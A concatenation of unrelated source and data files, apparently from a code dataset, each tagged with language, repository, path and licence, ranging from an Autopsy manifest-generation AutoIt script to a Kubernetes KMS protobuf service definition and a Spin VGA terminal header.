湖南时尚台/ntv/hu nan shi shang tai/null
湖南影视台/ntv/hu nan ying shi tai/null
湖南娱乐台/ntv/hu nan yu le tai/null
江苏城市台/ntv/jiang su cheng shi tai/null
江苏教育台/ntv/jiang su jiao yu tai/null
江苏少儿台/ntv/jiang su shao er tai/null
江苏体育台/ntv/jiang su ti yu tai/null
江苏影视台/ntv/jiang su ying shi tai/null
昆明台/ntv/kun ming tai/null
南京台/ntv/nan jing tai/null
南京影视台/ntv/nan jing ying shi tai/null
青海台/ntv/qing hai tai/null
上海台/ntv/shang hai tai/null
台湾台/ntv/tai wan tai/null
台湾宏观台/ntv/tai wan hong guan tai/null
武汉台/ntv/wu han tai/null
潇湘电影台/ntv/xiao xiang dian ying tai/null
亚洲台/ntv/ya zhou tai/null
阳光台/ntv/yang guang tai/null
直播都市台/ntv/zhi bo du shi tai/null
| Lex | 1 | Wing-Luo/jcseg | vendors/lexicon/lex-live.lex | [
"Apache-2.0"
] |
>DL;804Angiostrongylus_cantonensis
--------------------------------------------------
----------------------------------ATT-AAGCCATG-CA-
T-GAG-GA--GTTC-A--GC------TT--TA-A----G-T-GA--AA-C
-TGCGAACGGCTCATTAG-AGCAGATG-T-GATT---TATT-CG--G--A
A-A--A-T--CC-T----ATT-GGA--TAACTGCG--GTAAT-TCTGGAG
CTAATACATGCGTAT-A-A-AC-CCTG-AC---T--T-T--C---GAAA-
-GGGTGCAAT-TA-TTAGAG---C---AA-A-TCAAT-CAT---------
----T-T---TC----------G-GA------TG----TAGTT-------
---T---GCT---G-A-C-TC-TGAATA-A---CG--CAG--CATA-TCG
G-CGGC-T-T-GT---TCGCCGATAAT-CCGAAAA----AG---TGT-C-
TGCCC-TATCA--AC---CT---GA-TGGTAGTCTATTAGTCTA-CCATG
GTTATTACGGGTAACGGAGAATAAGGGTT-CGACTCCGGAGAGGGAGCCT
TAGAAACGGCTACCACATCCAAGGAAGGCAGCAG-GCGCGAAACTTATCC
AA-T-CTTG-----A-ATAGATGA-GATAGTGACT---------------
--------AAAAATAAAAA--GACCA---TTCC-T-AT-G--GAACG-GT
TATTTCAATGAGT--TGATCATAAACCTTTTTT--C-G-AGTA--TCCAG
TGGAGGGCAAGTCTGGTGCCAGCAGCCGCGGTAATTCCAGCTC--CACTA
GTGTA-AATCGTCATTGCTGCGGTTAAAAAGC-TCGTAGTTGGAT-C-TG
AGTTGC---AT--GCA-AT-G-ATTCG--C-CT----T--TG--G--CGT
----TAAT------C---AT-TG-TTGTG---ACTA---T------T-T-
--G--CTG--G-T-T--TTCT-AT--TG-A--AA-----TTTC-----G-
A-TT-----TCTTTA-GTG-GC-TA--GCGA-GTT-TA-CTTTGA-AT-A
AATTAAAGTGCT-CAGAACAAG---CGTT-----T--GC-TT-G--AAT-
G-GTCGAT-CATGGAATAA-----TAAAAGAGGAC--TTCG---GT-T--
----CTATT-T----ATTGGTTC-AG---G-AA------CTG------AA
GT-AATGATTAAGAGGGACA--ATTC-GGGGGCATTCGTATCCCTGCGCG
AGAGGTGAAATTCGTG-GACCG-CAGGGGGACGCCCTAAAGCGAAAG-CA
TTTGCC-AAGAAT--GTCTTCATTAATCA-AGAACGAAAGTCAGAGGTTC
GAAGGCGATTAGATA--CCGCCC-TAGTTCTGACCGTAAACTATGCCATC
TAGC-GA--TCC-GAT--GG-GG--TA--T--TG--T-T----GCCTT--
GTCGAGG-AGCTT-CCCGGAAACGA--AA-GTCTTTCGGT-TCCTGGGGT
AGTATGGTTGC-AAAGCT-G-AAACTTAAAGA-AATTGACGGAATGGCAC
CACCAGGAGTGGAGCCTGCGGCTTAATTTGACTCAACACGGGA--AAACT
-CACCC-GGCCCGGACACCGTAA-GGATTGAC-----AGATTGA--A---
AGCTCTTTCTC-GATTTGGTGGTTGGTGGTGCATGGCCGTTCTTAGTTG-
GTGGAG-CGATTTGTCTGGTTTATTCC-GAT-AACGAGCGAGACTCT-AG
-C-C--TG-CTAAA-TA-G--TGA--CTA---------------GA----
TT-----------AT------T----GAGTC-------TA-G----T--C
-------TA-------------C-TT-----CTT-AG---AGGGATAAG-
CGG---TGTT-T-----A-G-C--CGCA--CG-AGATTGAGCGATAACAG
GTCTGTGATGCCCTTAGATGTCCGGGG-CTG-CACGCGCGCTACAATGGA
AG-AAT-CAGC--TGGC---CTA--T----CCAT-TGC-CG-A-AAGGT-
AT----T----GGTAAACCG-TTGAAACT--CTTCC-GTG-ACCGGGATA
GGGAATTGT--A-ATT---------ATT---TCCC-TTGAACG-AGGAAT
TCCTAGTAAGTGTG-AGTCATCAGCTCACGCTGATTACGTCCC-TGCCAT
TTGTACACACCGCCCGTCGCTGTC-CGGG-ACTG--AGC-TGTC--TCGA
GAGGACT-GCGG-A-CTA----CT--GTA----TTGA-GG---CCT----
---T---CGGG------TCG-----CGATA----TGGCG---GG-AAA-C
AG-TTC-AATC-G-CAATG-G--CTTGAACCGGGTAAAAGTCGT-AACAA
GGTATCTG------------------------------------------
---------------------------
*
>DL;815Parelaphostrongylus_odocoil
--------------------------------------------------
----------------------------------ATT-AAGCCATG-CA-
T-GTG-GA--GTTC-A--AC------TT--CA-A---AG-T-GA--AA-C
-TGCGAACGGCTCATTAG-AGCAGATG-T-CATT---TATT-CG--G--A
A-A--A-T--CC-T--T-AAT-GGA--TAACTGCG--GTAAT-TCTGGAG
CTAATACATATGCAT-A-A-AC-CCTG-AC---T--C-TG-T---GAAA-
-GGGTGCAAT-TA-TTAGAG---C---AA-A-TCAAT-CAT---------
----T-T---TC----------G-GA------TG----TAGTT-------
---T---GCT---G-A-C-TC-TGAATA-A---CG--CAG--CATA-TCG
G-CGGC-T-T-GT---TCGCCGATATT-CCGAAAA----AG---TGT-C-
TGCCC-TATCA--AC---CT---GA-TGGTAGTCTATTAGTCTA-CCATG
GTTATTACGGGTAACGGAGAATAAGGGTT-CGACTCCGGAGAGGGAGCCT
TAGAAACGGCTACCACATCCAAGGAAGGCAGCAG-GCGCGAAACTTATCC
AA-T-CTTG-----A-ATAGATGA-GATAGTGACT---------------
--------AAAAATAAAAA--GACCA---TTCC-T-AT-G--GAACG-GT
CATTTCAATGAGT--TGATCATAAACCTTTTTT--C-G-AGTA--TCAAG
TGGAGGGCAAGTCTGGTGCCAGCAGCCGCGGTAATTCCAGCTC--CACTA
GTGTA-AATCGTCATTGCTGCGGTTAAAAAGC-TCGTAGTTGGAT-C-TG
AGTCGC---AT--GCA-AT-G-ATTCG--C-CT----T--TG--G--CGT
----TAAT------C---AT-TG-TTGTG---ACTA---T------T-T-
--G--CTG--G-T-T--TTCT-AT--TG-A--AA-----TTTC-----G-
A-TT-----TCTATA-GTG-GC-TA--GCGA-GTT-TA-CTTTGA-AT-A
AATTAAAGTGCT-CAGAACAAG---CGTT-----T--GC-TT-G--AAT-
G-GTCGAT-CATGGAATAA-----TAAAAGAGGAC--TTCG---GT-T--
----CTATT-T----ATTGGTTC-AG---G-AA------CTG------AA
AT-AATGGTTAAGAGGGACA--ATTC-GGGGGCATTCGTATCCCTGCGCG
AGAGGTGAAATTCGTG-GACCG-CAGGGGGACGCCCTAAAGCGAAAG-CA
TTTGCC-AAGAAT--GTCTTCATTAATCA-AGAACGAAAGTCAGAGGTTC
GAAGGCGATTAGATA--CCGCCC-TAGTTCTGACCGTAAACTATGCCATC
TAGC-GA--TCC-GAT--GG-GG--TA--T--TG--T-T----GCCTT--
GTCGAGG-AGCTT-CCCGGAAACGA--AA-GTCTTTCGGT-TCCTGGGGT
AGTATGGTTGC-AAAGCT-G-AAACTTAAAGA-AATTGACGGAATGGCAC
CACCAGGAGTGGAGCCTGCGGCTTAATTTGACTCAACACGGGA--AAACT
-CACCC-GGCCCGGACACCGTAA-GGATTGAC-----AGATTGA--A---
AGCTCTTTCTC-GATTTGGTGGTTGGTGGTGCATGGCCGTTCTTAGTTG-
GTGGAG-CGATTTGTCTGGTTTATTCC-GAT-AACGAGCGAGACTCT-AG
-C-C--TG-CTAAA-TA-G--TGA--CTA---------------GA----
T------------ACG-----T----ATGTC-------TA-G----T--C
-------TA-------------C-TT-----CTT-AG---AGGGATAAG-
CGG---TGTT-T-----A-G-C--CGCA--CG-AGATTGAGCGATAACAG
GTCTGTGATGCCCTTAGATGTTCGGGG-CTG-CACGCGCGCTACAATGGA
AG-AAT-CAGC--TGGC---CTA--T----CCAT-TAC-CG-A-AAGGT-
AT----T----GGTAAACCG-TTGAAACT--CTTCC-GTG-ACCGGGATA
GGGAATTGT--A-ATT---------ATT---TCCC-TTGAACG-AGGAAT
TCCTAGTAAGTGTG-AGTCATCAGCTCACGCTGATTACGTCCC-TGCCAT
TTGTACACACCGCCCGTCGCTGTC-CGGG-ACTG--AGC-TGTC--TCGA
GAGGACT-GCGG-A-CTA----CT--GTA----TTGA-GG---CCT----
---T---CGGG------TCG-----CGATA----TGGCG---GG-AAA-C
AG-TTC-AATC-G-CAATG-G--CTTGAACCGGGTAAAAGTCGT-A----
--------------------------------------------------
---------------------------
*
| Parrot Internal Representation | 1 | lukasz-kozlowski/biopython | Tests/NBRF/clustalw.pir | [
"BSD-3-Clause"
] |
[ data-sizes~="m:0" ] {
color:pink;
}
[ class*="test" ]{
color: silver}
| CSS | 3 | fuelingtheweb/prettier | tests/stylefmt/attr-selector/attr-selector.css | [
"MIT"
] |
;==============================================================================
; Autopsy Forensic Browser
;
; Copyright 2019 Basis Technology Corp.
; Contact: carrier <at> sleuthkit <dot> org
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
; http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.
;==============================================================================
#include <GUIConstantsEx.au3>
#include <MsgBoxConstants.au3>
#include <ProgressConstants.au3>
#include <File.au3>
#include <WinAPIFiles.au3>
#include <ScrollBarConstants.au3>
#include <GuiEdit.au3>
#include <Date.au3>
;Get the list of names of algorithms
Global $algorithms[3] ;increase size of array when adding new algorithms
$algorithms[0] = "Single data source"
$algorithms[1] = "Folder of logical files"
$algorithms[2] = "One data source per folder"
Global $algorithmDescriptions[3] ;increase size of array when adding new algorithms
$algorithmDescriptions[0] = "Create a single auto ingest manifest file for a single disk image or VM file."
$algorithmDescriptions[1] = "Create a single auto ingest manifest file for a single folder of logical files."
$algorithmDescriptions[2] = "Create a manifest file for the first supported image of each subfolder of a case folder. If no supported images exist in the folder a manifest will be generated for the folders contents as a logical file set. Supported disk image or VM files: .e01, .l01, .001, .ad1"
; $algorithms[2] = "All Files In One Folder"
Global $progressArea = Null
Global $manifestFileNameEnd = "Manifest"
Global $manifestExtension = ".xml"
;Return an array containing the names of all algorithms
Func GetAlgorithmNames()
Return $algorithms
EndFunc
;Return the description for the specified algorithm index
Func GetAlgorithmDescription($index)
Return $algorithmDescriptions[$index]
EndFunc
;Return the name of the first algorithm as a default algorithm
Func GetDefaultAlgorithmName()
Return $algorithms[0]
EndFunc
;Run the function that corresponds to the specified Algorithm name
;Use Null for $progressArea if not called from a GUI with a $progressArea
Func RunAlgorithm($selectedAlgorithm, $settings, ByRef $progressAreaRef)
$progressArea = $progressAreaRef
UpdateProgressArea("Analyzing: " & $settings[0])
if ($selectedAlgorithm == $algorithms[2]) Then
OneDataSourcePerFolder($settings)
ElseIf ($selectedAlgorithm == $algorithms[0]) Then
SingleDataSource($settings)
ElseIf ($selectedAlgorithm == $algorithms[1]) Then
SingleDataSource($settings)
; ElseIf ($selectedAlgorithm == $algorithms[2]) Then
; AllFilesInOneFolder($settings)
EndIf
UpdateProgressArea("-------------------------------------------------------------------------------------------") ;blank line for some
EndFunc
;Create a manifest file in the specified $caseDir named $manifestDir _Manifest.xml
;if the $manifestFile is specified the datasource included will be the file instead of the entire folder
Func GenerateCaseNameAndWriteManifestFile($caseDir, $subDirName, $manifestFile)
Local $manifestName = ""
Local $caseName = ""
Local $dataSourcePath = ""
;If the manifestDirectory is not Null use it for the file name
if ($subDirName <> Null) Then
$manifestName = $subDirName
$dataSourcePath = $manifestName
if ($manifestFile <> Null) Then
$dataSourcePath = $dataSourcePath & "\" & $manifestFile
EndIf
;If the manifestDirectory was Null then use the file name
ElseIf ($manifestFile <> Null) Then
$manifestName = $manifestFile
$dataSourcePath = $manifestName
Else
UpdateProgressArea("ERROR: Invalid arguements provided, unable to create manifest file")
Return
EndIf
Local $splitCaseDir = StringSplit($caseDir, "\", $STR_ENTIRESPLIT)
$caseName = $splitCaseDir[$splitCaseDir[0]]
Local $manfiestFilePath = $caseDir & "\" & $manifestName & "_" & $manifestFileNameEnd & $manifestExtension
WriteManifestFile($manfiestFilePath, $manifestName, $caseName, $dataSourcePath)
EndFunc
;Write the specified manifest file.
Func WriteManifestFile($manifestFilePath, $manifestName, $caseName, $dataSourcePath)
_FileCreate($manifestFilePath)
Local $fileHandle = FileOpen($manifestFilePath, $FO_APPEND)
If $fileHandle == -1 Then
UpdateProgressArea("ERROR: " & $manifestName & " Unable to create manifest file")
Return
EndIf
FileWrite($fileHandle,'<?xml version="1.0" encoding="UTF-8" standalone="no"?>' & @CRLF)
FileWrite($fileHandle,'<AutopsyManifest>' & @CRLF)
FileWrite($fileHandle,'<CaseName>' & $caseName &'</CaseName>' & @CRLF)
;Device ID is not a required field
FileWrite($fileHandle,'<DataSource>' & $dataSourcePath & '</DataSource>' & @CRLF)
FileWrite($fileHandle,'</AutopsyManifest>' & @CRLF)
FileClose($fileHandle)
UpdateProgressArea($manifestName & " manifest created")
EndFunc
;get the extension of a file
Func GetFileExtension($fileName)
Local $fileExtension
_PathSplit ($fileName, "", "", "", $fileExtension)
Return $fileExtension
EndFunc
;Return 0 for false if no manifest files exist in the caseDir, or 1 for true if manifest files do exist
Func ManifestFilesAlreadyExist($fileList)
Local $fileName
Local $fileExtension
For $i = 1 To $fileList[0] Step 1
_PathSplit ($fileList[$i], "", "", $fileName, $fileExtension)
If StringCompare($fileExtension, $manifestExtension, $STR_NOCASESENSE) == 0 Then
Local $splitFileName = StringSplit($fileName, "_", $STR_ENTIRESPLIT)
if $splitFileName[0] > 1 Then ;It split into more than one chunk so the last chunk should match our _Manifest
If StringCompare($splitFileName[$splitFileName[0]], $manifestFileNameEnd, $STR_NOCASESENSE) == 0 Then
UpdateProgressArea("Folder already contains manifest file: " & $fileList[$i])
Return 1
EndIf
EndIf
EndIf
Next
Return 0
EndFunc
;Check if a manifest file already exists for a specific datasource in the case Dir
;Return 1 if a manifest exists
;Return 0 if no manifest exists
Func ManifestAlreadyExists($manifestFilePath)
If FileExists($manifestFilePath) == 1 Then
Return 1
Else
Return 0
EndIf
EndFunc
;Algorithm for the "One Data Source Per Folder"
;Creates manifest files
Func OneDataSourcePerFolder($settings)
Local $validDirectory = 1
Local $caseDir = $settings[0]
;_FileListToArray returns the count of files/folders as the first value then the contents
Local $fileList = _FileListToArray($caseDir, Default, $FLTA_FILES, False)
Local $caseDirSplit = StringSplit($caseDir, "\", $STR_ENTIRESPLIT)
Local $caseDirName
if ($caseDirSplit[0] > 1) Then
;if case folder is longer than one directory display just the directory name in progress messages
$caseDirName = $caseDirSplit[$caseDirSplit[0]]
Else
;if there is only one directory use the entire case dir path
EndIf
If (@error == 1) Then
$validDirectory = 0
UpdateProgressArea("ERROR: " & $caseDirName & " not found")
MsgBox($MB_OK, "Directory Not Found", "Selected directory " & $caseDirName & " was not found.")
ElseIf (@error > 0) Then
;An acceptable condition as no files means no manifest files
EndIf
Local $dirList = _FileListToArray($caseDir, Default, $FLTA_FOLDERS, True)
If (@error ==4) Then
UpdateProgressArea($caseDirName & " no folders found")
MsgBox($MB_OK, "Selected Directory Empty", "Selected directory " & $caseDirName & " did not contain any subfolders to use as data sources for manifest files.")
$validDirectory = 0
EndIf
If $validDirectory = 1 Then
Local $validExtensions[4] = [".e01", ".l01", ".001", ".ad1"] ;valid extensions for the One Data Source Per Folder algorithm
Local $subDirectoryFileList
Local $validSubDirectory
For $fileNumber = 1 TO $dirList[0] Step 1
Local $manifestFile = Null
Local $manifestDir = $dirList[$fileNumber]
Local $splitManifestDir = StringSplit($manifestDir, "\", $STR_ENTIRESPLIT)
Local $manifestDirName = $splitManifestDir[$splitManifestDir[0]]
$subDirectoryFileList = _FileListToArray($dirList[$fileNumber], Default, Default, False)
$validSubDirectory = 1
If (@error == 1) Then
$validSubDirectory = 0
UpdateProgressArea("ERROR: " & $dirList[$fileNumber] & " not found")
ElseIf (@error ==4) Then
UpdateProgressArea($manifestDirName & " empty, no manifest created")
$validSubDirectory = 0
EndIf
If $validSubDirectory == 1 Then
For $i = 1 TO $subDirectoryFileList[0] Step 1
Local $currentFilesExtension = GetFileExtension($subDirectoryFileList[$i])
For $extension IN $validExtensions
;should only be one file or directory in this folder since we checked the number of contents previously
If StringCompare($extension, $currentFilesExtension, $STR_NOCASESENSE) == 0 Then
$manifestFile = $subDirectoryFileList[$i]
ExitLoop 2 ;match was found no reason to check remaining extensions or files in a One Data Source Per Folder algorithm
EndIf
Next
Next
Local $manifestFilePath = $caseDir & "\" & $manifestDirName & "_" & $manifestFileNameEnd & $manifestExtension
If (ManifestAlreadyExists($manifestFilePath) <> 1) Then
;should only be one file and it should end with a valid extension add as image file, or the whole directory is added as a logical file set
GenerateCaseNameAndWriteManifestFile($caseDir, $manifestDirName, $manifestFile)
Else
UpdateProgressArea($manifestDirName & " manifest exists, skipping")
EndIf
EndIf
Next
UpdateProgressArea($caseDirName & " manifest generation complete")
EndIf
EndFunc
;Create a manifest file for a single data source in the same directory that contains the data source (also used for Folder of Logical Files)
Func SingleDataSource($settings)
Local $dataSourcePath = $settings[0]
Local $caseDir = ""
Local $caseDrive = ""
Local $dsName = ""
Local $dsExtension = ""
_PathSplit ($dataSourcePath, $caseDrive, $caseDir, $dsName, $dsExtension)
$caseDir = $caseDrive & $caseDir
Local $caseName = $settings[1]
Local $manfiestFilePath = $caseDir & "\" & $dsName & "_" & $manifestFileNameEnd & $manifestExtension
If (ManifestAlreadyExists($manfiestFilePath) <> 1) Then
;should only be one file and it should end with a valid extension add as image file, or the whole directory is added as a logical file set
WriteManifestFile($manfiestFilePath, $dsName, $caseName, $dsName & $dsExtension)
Else
UpdateProgressArea($dsName & " manifest exists, skipping")
EndIf
EndFunc
;Algorithm for the All Files in One Folder
;Creates manifest files for all files and directories in a single directory
Func AllFilesInOneFolder($settings)
Local $validDirectory = 1
Local $caseDir = $settings[0]
;_FileListToArray returns the count of files/folders as the first value then the contents
Local $fileList = _FileListToArray($caseDir, Default, $FLTA_FILES, False)
If (@error == 1) Then
$validDirectory = 0
UpdateProgressArea("Selected directory " & $caseDir & " was not found")
MsgBox($MB_OK, "Directory Not Found", "Selected directory " & $caseDir & " was not found")
ElseIf (@error > 0) Then
Local $dirList = _FileListToArray($caseDir, Default, $FLTA_FOLDERS, True)
If (@error ==4) Then
UpdateProgressArea("Selected directory " & $caseDir & " was empty and contained nothing to generate manifest files for")
MsgBox($MB_OK, "Selected Directory Empty", "Selected directory " & $caseDir & " was empty and contained nothing to generate manifest files for")
$validDirectory = 0
EndIf
;An acceptable condition as no files means no manifest files
ElseIf ManifestFilesAlreadyExist($fileList) == 1 Then
UpdateProgressArea("Selected directory " & $caseDir & " already contains manifest files, they must be deleted before generating new ones")
MsgBox($MB_OK, "Manifest Files Exist", "Selected directory " & $caseDir & " already contains manifest files, they must be deleted before generating new ones")
$validDirectory = 0
EndIf
Local $contentsList = _FileListToArray ($caseDir, Default, Default, False)
If $validDirectory = 1 Then
For $fileNumber = 1 TO $contentsList[0] Step 1
Local $manifestDir = Null
Local $manifestFile = $contentsList[$fileNumber]
GenerateCaseNameAndWriteManifestFile($caseDir, $manifestDir, $manifestFile)
Next
UpdateProgressArea($caseDir & " manifest generation complete")
EndIf
EndFunc
;If the progress area is Null it will not be updated
Func UpdateProgressArea($textToAdd)
if ($progressArea <> Null) Then
Local $currentProgressAreaText = GUICtrlRead($progressArea)
$currentProgressAreaText = $currentProgressAreaText & @CRLF & "--" & $textToAdd
GUICtrlSetData($progressArea, $currentProgressAreaText)
_GUICtrlEdit_Scroll($progressArea, $SB_SCROLLCARET)
EndIf
EndFunc | AutoIt | 4 | ljmf00/autopsy | Tools/ManifestTool/ManifestGenerationAlgorithms.au3 | [
"Apache-2.0"
] |
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:myObj="urn:my-object">
<xsl:template match="/">
<result>
<func1>1.<xsl:value-of select="myObj:Fn1()"/></func1>
<func2>2.<xsl:value-of select="myObj:Fn2()"/></func2>
<func3>3.<xsl:value-of select="myObj:Fn3()"/></func3>
</result>
</xsl:template>
</xsl:stylesheet> | XSLT | 3 | pyracanda/runtime | src/libraries/System.Private.Xml/tests/Xslt/TestFiles/TestData/XsltApiV2/myObjectDef.xsl | [
"MIT"
] |
---
id: 561add10cb82ac39a17513bc
title: Certificação de visualização de dados legado
certification: legacy-data-visualization
challengeType: 7
isPrivate: true
tests:
-
id: bd7157d8c242eddfaeb5bd13
title: Criar um pré-visualizador de markdown
-
id: bd7156d8c242eddfaeb5bd13
title: Criar um painel de estatísticas dos campers
-
id: bd7155d8c242eddfaeb5bd13
title: Criar uma caixa de receitas
-
id: bd7154d8c242eddfaeb5bd13
title: Criar o Jogo da Vida
-
id: bd7153d8c242eddfaeb5bd13
title: Criar um jogo de RPG do tipo Dungeon Crawler
-
id: bd7168d8c242eddfaeb5bd13
title: Visualizar dados com um gráfico de barras
-
id: bd7178d8c242eddfaeb5bd13
title: Visualizar dados com um gráfico de dispersão
-
id: bd7188d8c242eddfaeb5bd13
title: Visualizar dados com um mapa de calor
-
id: bd7198d8c242eddfaeb5bd13
title: Mostrar contiguidade nacional com um gráfico direcionado de força
-
id: bd7108d8c242eddfaeb5bd13
title: Mapear dados através do mundo
| YAML | 3 | fcastillo-serempre/freeCodeCamp | curriculum/challenges/portuguese/00-certifications/legacy-data-visualization-certification/legacy-data-visualization-certification.yml | [
"BSD-3-Clause"
] |
--
-- Simple program using multiple integer channels
--
%handles:
IntTerm =
Get
Put
Close
%cohandles:
Console =
Get
Put
Close
%run ( | console => intTerm1,intTerm2) :
hput intTerm1 IntTerm.Get
get intTerm1
store x
load x
hput intTerm2 IntTerm.Put
put intTerm2
hput intTerm2 IntTerm.Get
get intTerm2
store y
load y
hput intTerm1 IntTerm.Put
put intTerm1
hput intTerm2 IntTerm.Close
close intTerm2
hput intTerm1 IntTerm.Close
close intTerm1
hput console Console.Close
halt console
| AMPL | 2 | prashant007/AMPL | myAMPL/src/test5.ampl | [
"MIT"
] |
#!/bin/bash
set -e
BASE_DIR=`dirname $0`
yarn run test-i18n
node $BASE_DIR/src/closureSlurper.js
yarn run test-i18n-ucd
echo "Generating ngParseExt"
node $BASE_DIR/ucd/src/extract.js
| Shell | 3 | skylarkfw/skylark-angular2 | original/angular.js-1.7.5/i18n/generate.sh | [
"MIT"
] |
SELECT * FROM VALUES('x UInt8, y UInt16', 1 + 2, 'Hello'); -- { serverError 36 }
| SQL | 2 | pdv-ru/ClickHouse | tests/queries/0_stateless/01658_values_ubsan.sql | [
"Apache-2.0"
] |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<PropertyGroup>
<RootNamespace>SimpleDatePicker</RootNamespace>
<ProjectGuid>{de17260f-4e0e-4e44-9b89-4d63a39f5637}</ProjectGuid>
<OutputType>executable</OutputType>
<AssemblyName>SimpleDatePicker</AssemblyName>
<AllowGlobals>False</AllowGlobals>
<AllowLegacyWith>False</AllowLegacyWith>
<AllowLegacyOutParams>False</AllowLegacyOutParams>
<AllowLegacyCreate>False</AllowLegacyCreate>
<AllowUnsafeCode>False</AllowUnsafeCode>
<Configuration Condition="'$(Configuration)' == ''">Release</Configuration>
<SDK>iOS</SDK>
<CreateAppBundle>True</CreateAppBundle>
<InfoPListFile>.\Resources\Info.plist</InfoPListFile>
<Name>SimpleDatePicker</Name>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Debug' ">
<Optimize>false</Optimize>
<OutputPath>.\bin\Debug</OutputPath>
<DefineConstants>DEBUG;TRACE;</DefineConstants>
<GenerateDebugInfo>True</GenerateDebugInfo>
<EnableAsserts>True</EnableAsserts>
<TreatWarningsAsErrors>False</TreatWarningsAsErrors>
<CaptureConsoleOutput>False</CaptureConsoleOutput>
<WarnOnCaseMismatch>True</WarnOnCaseMismatch>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Release' ">
<Optimize>true</Optimize>
<OutputPath>.\bin\Release</OutputPath>
<GenerateDebugInfo>False</GenerateDebugInfo>
<EnableAsserts>False</EnableAsserts>
<TreatWarningsAsErrors>False</TreatWarningsAsErrors>
<CaptureConsoleOutput>False</CaptureConsoleOutput>
<WarnOnCaseMismatch>True</WarnOnCaseMismatch>
<CreateIPA>True</CreateIPA>
</PropertyGroup>
<ItemGroup>
<Reference Include="CoreGraphics.fx" />
<Reference Include="Foundation.fx" />
<Reference Include="UIKit.fx" />
<Reference Include="rtl.fx" />
<Reference Include="libNougat.fx" />
</ItemGroup>
<ItemGroup>
<Compile Include="AppDelegate.pas" />
<Compile Include="JWADatePicker Helper\JWADatePicker.pas" />
<Compile Include="Program.pas" />
<Compile Include="StaticTableViewController.pas" />
</ItemGroup>
<ItemGroup>
<Content Include="Resources\Info.plist" />
<AppResource Include="Resources\App Icons\App-29.png" />
<AppResource Include="Resources\App Icons\App-48.png" />
<AppResource Include="Resources\App Icons\App-57.png" />
<AppResource Include="Resources\App Icons\App-58.png" />
<AppResource Include="Resources\App Icons\App-80.png" />
<AppResource Include="Resources\App Icons\App-96.png" />
<AppResource Include="Resources\App Icons\App-114.png" />
<AppResource Include="Resources\App Icons\App-120.png" />
<None Include="Resources\App Icons\App-512.png" />
<None Include="Resources\App Icons\App-1024.png" />
<AppResource Include="Resources\Launch Images\Default.png" />
<AppResource Include="Resources\Launch Images\Default@2x.png" />
<AppResource Include="Resources\Launch Images\Default-568h@2x.png" />
</ItemGroup>
<ItemGroup>
<Folder Include="JWADatePicker Helper" />
<Folder Include="Properties\" />
<Folder Include="Resources\" />
<Folder Include="Resources\App Icons\" />
<Folder Include="Resources\Launch Images\" />
</ItemGroup>
<ItemGroup>
<Storyboard Include="Resources\Storyboard.storyboard" />
</ItemGroup>
<Import Project="$(MSBuildExtensionsPath)\RemObjects Software\Oxygene\RemObjects.Oxygene.Nougat.targets" />
<PropertyGroup>
<PreBuildEvent />
</PropertyGroup>
</Project> | Oxygene | 2 | teamro/elements-samples | Oxygene/Cocoa/iOS/SimpleDatePicker/SimpleDatePicker/SimpleDatePicker.oxygene | [
"MIT"
] |
package inline
inline fun g(body: () -> Unit) {
body()
println("i'm inline function")
}
| Groff | 4 | qussarah/declare | jps-plugin/testData/incremental/multiModule/inlineFunctionTwoPackageParts/module1_inlineG.kt.new.2 | [
"Apache-2.0"
] |
package test
class A
class Some<T> where T: <caret>A
| Kotlin | 3 | Mu-L/kotlin | analysis/analysis-api/testData/referenceResolve/ReferenceInClassWhereConstraint.kt | [
"ECL-2.0",
"Apache-2.0"
] |
/*
Copyright 2018 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// To regenerate service.pb.go run hack/update-generated-kms.sh
syntax = "proto3";
package v1beta1;
// This service defines the public APIs for remote KMS provider.
service KeyManagementService {
// Version returns the runtime name and runtime version of the KMS provider.
rpc Version(VersionRequest) returns (VersionResponse) {}
// Execute decryption operation in KMS provider.
rpc Decrypt(DecryptRequest) returns (DecryptResponse) {}
// Execute encryption operation in KMS provider.
rpc Encrypt(EncryptRequest) returns (EncryptResponse) {}
}
message VersionRequest {
// Version of the KMS plugin API.
string version = 1;
}
message VersionResponse {
// Version of the KMS plugin API.
string version = 1;
// Name of the KMS provider.
string runtime_name = 2;
// Version of the KMS provider. The string must be semver-compatible.
string runtime_version = 3;
}
message DecryptRequest {
// Version of the KMS plugin API.
string version = 1;
// The data to be decrypted.
bytes cipher = 2;
}
message DecryptResponse {
// The decrypted data.
bytes plain = 1;
}
message EncryptRequest {
// Version of the KMS plugin API.
string version = 1;
// The data to be encrypted.
bytes plain = 2;
}
message EncryptResponse {
// The encrypted data.
bytes cipher = 1;
}
| Protocol Buffer | 5 | yankay/autoscaler | vertical-pod-autoscaler/e2e/vendor/k8s.io/apiserver/pkg/storage/value/encrypt/envelope/v1beta1/service.proto | [
"Apache-2.0"
] |
'' VGA_1024.spin
''
'' MODIFIED BY VINCE BRIEL FOR POCKETERM FEATURES
'' MODIIFED BY JEFF LEDGER / AKA OLDBITCOLLECTOR
''
CON
cols = 80 '128 ' number of screen columns
lcols = cols / 4 ' number of long in columns
rows = 40 '64 ' number of screen rows
chars = rows*cols ' number of screen characters
esc = $CB ' keyboard esc char
rowsnow = 36 ' adjusted for split screen effect
maxChars = rowsnow*cols ' adjusted value for split screen effect
lastChar = maxChars / 4 ' last screen position in longs adjusted for split
lastLine = (rowsnow - 1) * cols ' character position of last row
cols1 = 81 ' adjusted value for 80th character
TURQUOISE = $29
OBJ
vga : "vga_Hires_Text"
VAR
byte screen[chars] ' screen character buffer
byte tmpl[cols] ' temporary line buffer
